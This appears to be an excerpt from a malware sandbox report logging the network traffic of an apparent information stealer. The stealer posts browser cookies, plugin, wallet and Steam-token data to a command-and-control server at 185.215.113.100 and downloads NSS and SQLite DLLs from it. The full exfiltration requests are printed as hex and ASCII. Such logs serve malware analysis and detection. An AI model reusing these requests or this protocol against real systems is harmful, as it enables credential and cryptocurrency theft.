Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AEHIJDAFBKFHIDGCFBFCHost: 185.215.113.100Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 45 48 49 4a 44 41 46 42 4b 46 48 49 44 47 43 46 42 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 37 45 33 46 32 34 33 39 43 39 30 31 39 34 32 37 37 39 37 33 36 0d 0a 2d 2d 2d 2d 2d 2d 41 45 48 49 4a 44 41 46 42 4b 46 48 49 44 47 43 46 42 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6c 65 76 61 0d 0a 2d 2d 2d 2d 2d 2d 41 45 48 49 4a 44 41 46 42 4b 46 48 49 44 47 43 46 42 46 43 2d 2d 0d 0a Data Ascii: ------AEHIJDAFBKFHIDGCFBFCContent-Disposition: form-data; name="hwid"57E3F2439C901942779736------AEHIJDAFBKFHIDGCFBFCContent-Disposition: form-data; name="build"leva------AEHIJDAFBKFHIDGCFBFC--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FHIIEHJKKECGCBFIIJDAHost: 185.215.113.100Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 48 49 49 45 48 4a 4b 4b 45 43 47 43 42 46 49 49 4a 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 63 37 62 37 64 63 36 61 61 35 62 36 33 32 36 33 37 31 39 33 36 65 63 61 30 32 30 31 37 31 39 33 31 63 34 36 66 39 61 33 32 63 31 38 64 30 34 64 64 31 63 35 33 36 36 33 38 62 66 38 31 37 61 63 37 62 35 61 65 34 36 0d 0a 2d 2d 2d 2d 2d 2d 46 48 49 49 45 48 4a 4b 4b 45 43 47 43 42 46 49 49 4a 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 46 48 49 49 45 48 4a 4b 4b 45 43 47 43 42 46 49 49 4a 44 41 2d 2d 0d 0a Data Ascii: ------FHIIEHJKKECGCBFIIJDAContent-Disposition: form-data; name="token"0c7b7dc6aa5b6326371936eca020171931c46f9a32c18d04dd1c536638bf817ac7b5ae46------FHIIEHJKKECGCBFIIJDAContent-Disposition: form-data; name="message"browsers------FHIIEHJKKECGCBFIIJDA--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EHJDGCBGDBKJKFHIECBAHost: 185.215.113.100Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 48 4a 44 47 43 42 47 44 42 4b 4a 4b 46 48 49 45 43 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 63 37 62 37 64 63 36 61 61 35 62 36 33 32 36 33 37 31 39 33 36 65 63 61 30 32 30 31 37 31 39 33 31 63 34 36 66 39 61 33 32 63 31 38 64 30 34 64 64 31 63 35 33 36 36 33 38 62 66 38 31 37 61 63 37 62 35 61 65 34 36 0d 0a 2d 2d 2d 2d 2d 2d 45 48 4a 44 47 43 42 47 44 42 4b 4a 4b 46 48 49 45 43 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 45 48 4a 44 47 43 42 47 44 42 4b 4a 4b 46 48 49 45 43 42 41 2d 2d 0d 0a Data Ascii: ------EHJDGCBGDBKJKFHIECBAContent-Disposition: form-data; name="token"0c7b7dc6aa5b6326371936eca020171931c46f9a32c18d04dd1c536638bf817ac7b5ae46------EHJDGCBGDBKJKFHIECBAContent-Disposition: form-data; name="message"plugins------EHJDGCBGDBKJKFHIECBA--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FIIIIDGHJEBFBGDHDGIIHost: 185.215.113.100Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 49 49 49 49 44 47 48 4a 45 42 46 42 47 44 48 44 47 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 63 37 62 37 64 63 36 61 61 35 62 36 33 32 36 33 37 31 39 33 36 65 63 61 30 32 30 31 37 31 39 33 31 63 34 36 66 39 61 33 32 63 31 38 64 30 34 64 64 31 63 35 33 36 36 33 38 62 66 38 31 37 61 63 37 62 35 61 65 34 36 0d 0a 2d 2d 2d 2d 2d 2d 46 49 49 49 49 44 47 48 4a 45 42 46 42 47 44 48 44 47 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 46 49 49 49 49 44 47 48 4a 45 42 46 42 47 44 48 44 47 49 49 2d 2d 0d 0a Data Ascii: ------FIIIIDGHJEBFBGDHDGIIContent-Disposition: form-data; name="token"0c7b7dc6aa5b6326371936eca020171931c46f9a32c18d04dd1c536638bf817ac7b5ae46------FIIIIDGHJEBFBGDHDGIIContent-Disposition: form-data; name="message"fplugins------FIIIIDGHJEBFBGDHDGII--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IJDGCAEBFIIECAKFHIJEHost: 185.215.113.100Content-Length: 6671Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/sqlite3.dll HTTP/1.1Host: 185.215.113.100Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FIJECAEHJJJKJKFIDGCBHost: 185.215.113.100Content-Length: 751Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 49 4a 45 43 41 45 48 4a 4a 4a 4b 4a 4b 46 49 44 47 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 63 37 62 37 64 63 36 61 61 35 62 36 33 32 36 33 37 31 39 33 36 65 63 61 30 32 30 31 37 31 39 33 31 63 34 36 66 39 61 33 32 63 31 38 64 30 34 64 64 31 63 35 33 36 36 33 38 62 66 38 31 37 61 63 37 62 35 61 65 34 36 0d 0a 2d 2d 2d 2d 2d 2d 46 49 4a 45 43 41 45 48 4a 4a 4a 4b 4a 4b 46 49 44 47 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 30 52 6c 5a 6d 46 31 62 48 51 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 46 49 4a 45 43 41 45 48 4a 4a 4a 4b 4a 4b 46 49 44 47 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 4c 6d 64 76 62 32 64 73 5a 53 35 6a 62 32 30 4a 56 46 4a 56 52 51 6b 76 43 55 5a 42 54 46 4e 46 43 54 45 32 4f 54 6b 77 4d 54 45 32 4d 54 55 4a 4d 56 42 66 53 6b 46 53 43 54 49 77 4d 6a 4d 74 4d 54 41 74 4d 44 51 74 4d 54 4d 4b 4c 6d 64 76 62 32 64 73 5a 53 35 6a 62 32 30 4a 52 6b 46 4d 55 30 55 4a 4c 77 6c 47 51 55 78 54 52 51 6b 78 4e 7a 45 79 4d 6a 4d 77 4f 44 45 31 43 55 35 4a 52 41 6b 31 4d 54 45 39 52 57 59 31 64 6c 42 47 52 33 63 74 54 56 70 5a 62 7a 56 6f 64 32 55 74 4d 46 52 6f 51 56 5a 7a 62 47 4a 34 59 6d 31 32 5a 46 5a 61 64 32 4e 49 62 6e 46 57 65 6c 64 49 51 56 55 78 4e 48 59 31 4d 30 31 4f 4d 56 5a 32 64 33 5a 52 63 54 68 69 59 56 6c 6d 5a 7a 49 74 53 55 46 30 63 56 70 43 56 6a 56 4f 54 30 77 31 63 6e 5a 71 4d 6b 35 58 53 58 46 79 65 6a 4d 33 4e 31 56 6f 54 47 52 49 64 45 39 6e 52 53 31 30 53 6d 46 43 62 46 56 43 57 55 70 46 61 48 56 48 63 31 46 6b 63 57 35 70 4d 32 39 55 53 6d 63 77 59 6e 4a 78 64 6a 46 6b 61 6d 52 70 54 45 70 35 64 6c 52 54 56 57 68 6b 53 79 31 6a 4e 55 70 58 59 57 52 44 55 33 4e 56 54 46 42 4d 65 6d 68 54 65 43 31 47 4c 54 5a 33 54 32 63 30 43 67 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 46 49 4a 45 43 41 45 48 4a 4a 4a 4b 4a 4b 46 49 44 47 43 42 2d 2d 0d 0a Data Ascii: ------FIJECAEHJJJKJKFIDGCBContent-Disposition: form-data; name="token"0c7b7dc6aa5b6326371936eca020171931c46f9a32c18d04dd1c536638bf817ac7b5ae46------FIJECAEHJJJKJKFIDGCBContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lX0RlZmF1bHQudHh0------FIJECAEHJJJKJKFIDGCBContent-Disposition: form-data; name="file"Lmdvb2dsZS5jb20JVFJVRQkvCUZBTFNFCTE2OTkwMTE2MTUJMVBfSkFSCTIwMjMtMTAtMDQtMTMKLmdvb2dsZS5jb20JRkFMU0UJLwlGQUxTRQkxNzEyMjMwODE1CU5JRAk1MTE9RWY1dlBGR3ctTVpZbzVod2UtMFRoQVZzbGJ4
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AKFHCAKJDBKKEBFIIJJEHost: 185.215.113.100Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 4b 46 48 43 41 4b 4a 44 42 4b 4b 45 42 46 49 49 4a 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 63 37 62 37 64 63 36 61 61 35 62 36 33 32 36 33 37 31 39 33 36 65 63 61 30 32 30 31 37 31 39 33 31 63 34 36 66 39 61 33 32 63 31 38 64 30 34 64 64 31 63 35 33 36 36 33 38 62 66 38 31 37 61 63 37 62 35 61 65 34 36 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 46 48 43 41 4b 4a 44 42 4b 4b 45 42 46 49 49 4a 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 46 48 43 41 4b 4a 44 42 4b 4b 45 42 46 49 49 4a 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 46 48 43 41 4b 4a 44 42 4b 4b 45 42 46 49 49 4a 4a 45 2d 2d 0d 0a Data Ascii: ------AKFHCAKJDBKKEBFIIJJEContent-Disposition: form-data; name="token"0c7b7dc6aa5b6326371936eca020171931c46f9a32c18d04dd1c536638bf817ac7b5ae46------AKFHCAKJDBKKEBFIIJJEContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------AKFHCAKJDBKKEBFIIJJEContent-Disposition: form-data; name="file"------AKFHCAKJDBKKEBFIIJJE--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GDGHJEHJJDAAAKEBGCFCHost: 185.215.113.100Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 44 47 48 4a 45 48 4a 4a 44 41 41 41 4b 45 42 47 43 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 63 37 62 37 64 63 36 61 61 35 62 36 33 32 36 33 37 31 39 33 36 65 63 61 30 32 30 31 37 31 39 33 31 63 34 36 66 39 61 33 32 63 31 38 64 30 34 64 64 31 63 35 33 36 36 33 38 62 66 38 31 37 61 63 37 62 35 61 65 34 36 0d 0a 2d 2d 2d 2d 2d 2d 47 44 47 48 4a 45 48 4a 4a 44 41 41 41 4b 45 42 47 43 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 47 44 47 48 4a 45 48 4a 4a 44 41 41 41 4b 45 42 47 43 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 47 44 47 48 4a 45 48 4a 4a 44 41 41 41 4b 45 42 47 43 46 43 2d 2d 0d 0a Data Ascii: ------GDGHJEHJJDAAAKEBGCFCContent-Disposition: form-data; name="token"0c7b7dc6aa5b6326371936eca020171931c46f9a32c18d04dd1c536638bf817ac7b5ae46------GDGHJEHJJDAAAKEBGCFCContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------GDGHJEHJJDAAAKEBGCFCContent-Disposition: form-data; name="file"------GDGHJEHJJDAAAKEBGCFC--
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/freebl3.dll HTTP/1.1Host: 185.215.113.100Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/mozglue.dll HTTP/1.1Host: 185.215.113.100Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/msvcp140.dll HTTP/1.1Host: 185.215.113.100Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/nss3.dll HTTP/1.1Host: 185.215.113.100Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/softokn3.dll HTTP/1.1Host: 185.215.113.100Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/vcruntime140.dll HTTP/1.1Host: 185.215.113.100Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BGDGHJEHJJDAAAKEBGCFHost: 185.215.113.100Content-Length: 1067Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FBKECFIIEHCFHIECAFBAHost: 185.215.113.100Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 42 4b 45 43 46 49 49 45 48 43 46 48 49 45 43 41 46 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 63 37 62 37 64 63 36 61 61 35 62 36 33 32 36 33 37 31 39 33 36 65 63 61 30 32 30 31 37 31 39 33 31 63 34 36 66 39 61 33 32 63 31 38 64 30 34 64 64 31 63 35 33 36 36 33 38 62 66 38 31 37 61 63 37 62 35 61 65 34 36 0d 0a 2d 2d 2d 2d 2d 2d 46 42 4b 45 43 46 49 49 45 48 43 46 48 49 45 43 41 46 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 46 42 4b 45 43 46 49 49 45 48 43 46 48 49 45 43 41 46 42 41 2d 2d 0d 0a Data Ascii: ------FBKECFIIEHCFHIECAFBAContent-Disposition: form-data; name="token"0c7b7dc6aa5b6326371936eca020171931c46f9a32c18d04dd1c536638bf817ac7b5ae46------FBKECFIIEHCFHIECAFBAContent-Disposition: form-data; name="message"wallets------FBKECFIIEHCFHIECAFBA--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HJJJECFIECBGDGCAAAEHHost: 185.215.113.100Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 4a 4a 4a 45 43 46 49 45 43 42 47 44 47 43 41 41 41 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 63 37 62 37 64 63 36 61 61 35 62 36 33 32 36 33 37 31 39 33 36 65 63 61 30 32 30 31 37 31 39 33 31 63 34 36 66 39 61 33 32 63 31 38 64 30 34 64 64 31 63 35 33 36 36 33 38 62 66 38 31 37 61 63 37 62 35 61 65 34 36 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4a 4a 45 43 46 49 45 43 42 47 44 47 43 41 41 41 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4a 4a 45 43 46 49 45 43 42 47 44 47 43 41 41 41 45 48 2d 2d 0d 0a Data Ascii: ------HJJJECFIECBGDGCAAAEHContent-Disposition: form-data; name="token"0c7b7dc6aa5b6326371936eca020171931c46f9a32c18d04dd1c536638bf817ac7b5ae46------HJJJECFIECBGDGCAAAEHContent-Disposition: form-data; name="message"files------HJJJECFIECBGDGCAAAEH--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CAFIJKFHIJKKEBGCFBFHHost: 185.215.113.100Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 41 46 49 4a 4b 46 48 49 4a 4b 4b 45 42 47 43 46 42 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 63 37 62 37 64 63 36 61 61 35 62 36 33 32 36 33 37 31 39 33 36 65 63 61 30 32 30 31 37 31 39 33 31 63 34 36 66 39 61 33 32 63 31 38 64 30 34 64 64 31 63 35 33 36 36 33 38 62 66 38 31 37 61 63 37 62 35 61 65 34 36 0d 0a 2d 2d 2d 2d 2d 2d 43 41 46 49 4a 4b 46 48 49 4a 4b 4b 45 42 47 43 46 42 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 43 41 46 49 4a 4b 46 48 49 4a 4b 4b 45 42 47 43 46 42 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 43 41 46 49 4a 4b 46 48 49 4a 4b 4b 45 42 47 43 46 42 46 48 2d 2d 0d 0a Data Ascii: ------CAFIJKFHIJKKEBGCFBFHContent-Disposition: form-data; name="token"0c7b7dc6aa5b6326371936eca020171931c46f9a32c18d04dd1c536638bf817ac7b5ae46------CAFIJKFHIJKKEBGCFBFHContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------CAFIJKFHIJKKEBGCFBFHContent-Disposition: form-data; name="file"------CAFIJKFHIJKKEBGCFBFH--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GDGHJEHJJDAAAKEBGCFCHost: 185.215.113.100Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 44 47 48 4a 45 48 4a 4a 44 41 41 41 4b 45 42 47 43 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 63 37 62 37 64 63 36 61 61 35 62 36 33 32 36 33 37 31 39 33 36 65 63 61 30 32 30 31 37 31 39 33 31 63 34 36 66 39 61 33 32 63 31 38 64 30 34 64 64 31 63 35 33 36 36 33 38 62 66 38 31 37 61 63 37 62 35 61 65 34 36 0d 0a 2d 2d 2d 2d 2d 2d 47 44 47 48 4a 45 48 4a 4a 44 41 41 41 4b 45 42 47 43 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 47 44 47 48 4a 45 48 4a 4a 44 41 41 41 4b 45 42 47 43 46 43 2d 2d 0d 0a Data Ascii: ------GDGHJEHJJDAAAKEBGCFCContent-Disposition: form-data; name="token"0c7b7dc6aa5b6326371936eca020171931c46f9a32c18d04dd1c536638bf817ac7b5ae46------GDGHJEHJJDAAAKEBGCFCContent-Disposition: form-data; name="message"ybncbhylepme------GDGHJEHJJDAAAKEBGCFC--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DAAECAFHDBGIDGCAEHJEHost: 185.215.113.100Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 41 41 45 43 41 46 48 44 42 47 49 44 47 43 41 45 48 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 63 37 62 37 64 63 36 61 61 35 62 36 33 32 36 33 37 31 39 33 36 65 63 61 30 32 30 31 37 31 39 33 31 63 34 36 66 39 61 33 32 63 31 38 64 30 34 64 64 31 63 35 33 36 36 33 38 62 66 38 31 37 61 63 37 62 35 61 65 34 36 0d 0a 2d 2d 2d 2d 2d 2d 44 41 41 45 43 41 46 48 44 42 47 49 44 47 43 41 45 48 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 44 41 41 45 43 41 46 48 44 42 47 49 44 47 43 41 45 48 4a 45 2d 2d 0d 0a Data Ascii: ------DAAECAFHDBGIDGCAEHJEContent-Disposition: form-data; name="token"0c7b7dc6aa5b6326371936eca020171931c46f9a32c18d04dd1c536638bf817ac7b5ae46------DAAECAFHDBGIDGCAEHJEContent-Disposition: form-data; name="message"wkkjqaiaxkhb------DAAECAFHDBGIDGCAEHJE--

Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.100
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.100
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.100
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.100
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.100
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.100
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.100
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.100
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.100
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.100
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.100
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.100
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.100
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.100
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.100
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.100
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.100
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.100
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.100
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.100
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.100
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.100
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.100
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.100
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.100
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.100
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.100
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.100
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.100
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.100
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.100
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.100
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.100
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.100
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.100
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.100
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.100
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.100
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.100
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.100
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.100
